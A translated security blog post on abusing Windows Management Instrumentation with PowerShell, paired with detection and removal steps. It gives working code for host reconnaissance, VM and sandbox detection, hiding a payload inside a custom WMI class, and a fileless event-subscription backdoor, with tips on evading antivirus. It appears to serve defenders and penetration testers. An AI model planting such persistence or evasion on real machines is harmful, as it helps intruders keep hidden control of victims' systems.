Merit student · 2015/08/24 10:19

0x00 Preface


At Black Hat, Matt Graeber presented how WMI can be abused and showed how it works, but many details were left out, so this post walks through how to implement WMI attacks using PowerShell.

0x01 Description


The most common use of WMI in penetration testing is wmiexec, which was covered earlier at http://drops.wooyun.org/tips/7358, so remote WMI is not the focus here.

Reference links: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

0x02 Test Environment


Operating system: Win8 x86, PowerShell v3 (default installation on Win8), Winmgmt service enabled (WMI supported)

0x03 WMI attacks


Note: all code below is PowerShell.

1. Reconnaissance

Operating system information

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS

List of files/directories

Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile

Disk Volume List

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume

Registry operations

Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents

As shown in the figure.

The current process

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process

List of services

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service

Event log

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent

Logged-on users

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser

Shares

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share

Installed patches

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering

Antivirus software

Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

2. VM detection

(1) Check TotalPhysicalMemory and NumberOfLogicalProcessors

$VMDetected = $False
$Arguments = @{
    Class  = 'Win32_ComputerSystem'
    Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'
}
if (Get-WmiObject @Arguments) {
    $VMDetected = $True
    "In vm"
}
else {
    "Not in vm"
}

(2) Check for VMware adapters, BIOS and processes

$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE "%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning) {
    $VMwareDetected = $True
    "in vm"
}
else {
    "not in vm"
}

3. Store payload

[Administrator rights]

$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null, $null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty', "This is payload")
$StaticClass.Put()

As shown in the figure.

Tip:

The payload can be stored encrypted in this location and decrypted at execution time, so that no file is ever saved to the hard disk.

4. Covertly launching a program on a timer

[Administrator rights]

$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ExecutablePath=$exePath; CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter; Consumer=$WMIEventConsumer}

As shown in the figure.

This runs notepad.exe every 60 seconds.

Tip:

Stuxnet used this backdoor technique before, implemented through MOF, and the method still works today... Many antivirus products in use do not block this behaviour...

0x04 WMI backdoor detection and removal

1. List the current WMI event subscriptions

[Administrator rights]

#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

As shown in the figure.
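The three queries above return the filters, consumers and bindings separately; the script below, an added example that is not code from the original post, resolves each binding to its filter query and consumer in one pass and flags the consumer classes that can execute commands or scripts. It assumes PowerShell v3 or later (for the -in operator) and administrator rights; the event ID 5861 check at the end is an assumption about Windows 8.1 / Server 2012 R2 and later, not about the Win8 test box used here.

```powershell
# Added example, not code from the original post: enumerate every permanent WMI
# event subscription in root\subscription, resolve each binding to its filter
# and consumer, and flag consumers that execute a command or script.
# Requires administrator rights, like the queries above.

$ns = 'root\subscription'

# Fetch filters and consumers once, keyed by relative path, so that each
# binding can be resolved without additional WMI round-trips.
$filters   = @{}
$consumers = @{}
Get-WmiObject -Namespace $ns -Class __EventFilter   | ForEach-Object { $filters[$_.__RELPATH]   = $_ }
Get-WmiObject -Namespace $ns -Class __EventConsumer | ForEach-Object { $consumers[$_.__RELPATH] = $_ }

$report = foreach ($b in Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding) {
    # Binding.Filter / Binding.Consumer are object references such as
    # __EventFilter.Name="BotFilter82", sometimes prefixed with \\host\namespace:
    $f = $filters[($b.Filter   -replace '^\\\\[^:]*:', '')]
    $c = $consumers[($b.Consumer -replace '^\\\\[^:]*:', '')]

    # Only these consumer classes run attacker-supplied code; the built-in
    # 'SCM Event Log Consumer' (NTEventLogEventConsumer) is therefore not flagged.
    $runsCode = ($c -ne $null) -and ($c.__CLASS -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer')

    $action = switch ($c.__CLASS) {
        'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)".Trim() }
        'ActiveScriptEventConsumer' { "$($c.ScriptingEngine): " + $(if ($c.ScriptText) { $c.ScriptText } else { $c.ScriptFileName }) }
        default                     { '(does not execute code)' }
    }

    [pscustomobject]@{
        Filter     = $f.Name
        Query      = $f.Query
        Consumer   = $c.Name
        Type       = $c.__CLASS
        Action     = $action
        Suspicious = $runsCode
    }
}

$report | Format-List

# Assumption: Windows 8.1 / Server 2012 R2 and later log each new permanent
# subscription as event 5861 in Microsoft-Windows-WMI-Activity/Operational.
try {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WMI-Activity/Operational'; Id = 5861 } -MaxEvents 20 -ErrorAction Stop |
        Select-Object TimeCreated, Message
} catch { Write-Warning "No 5861 events available: $_" }
```

Run against the backdoor from section 0x03 the report shows BotFilter82 bound to BotConsumer23 with Action C:\Windows\System32\notepad.exe and Suspicious set to True, while the default SCM Event Log binding is listed but not flagged.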

2. Remove the backdoor

[Administrator rights]

#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose

#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose

#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

As shown in the figure.

0x05 Summary

WMI attacks are not limited to PowerShell; they can also be implemented with, for example:

- VBS
- MOF
- C/C++ via the IWbem* COM API
- .NET System.Management classes

There are many ways to detect this, such as reviewing the following logs:

- Microsoft-Windows-WinRM/Operational
- Microsoft-Windows-WMI-Activity/Operational
- Microsoft-Windows-distributedcom

Disabling the Winmgmt service outright prevents this technique from being used at all.


More methods of WMI attacks are welcome to discuss.

This article was originally written by Merit student and first published on WooYun Drops.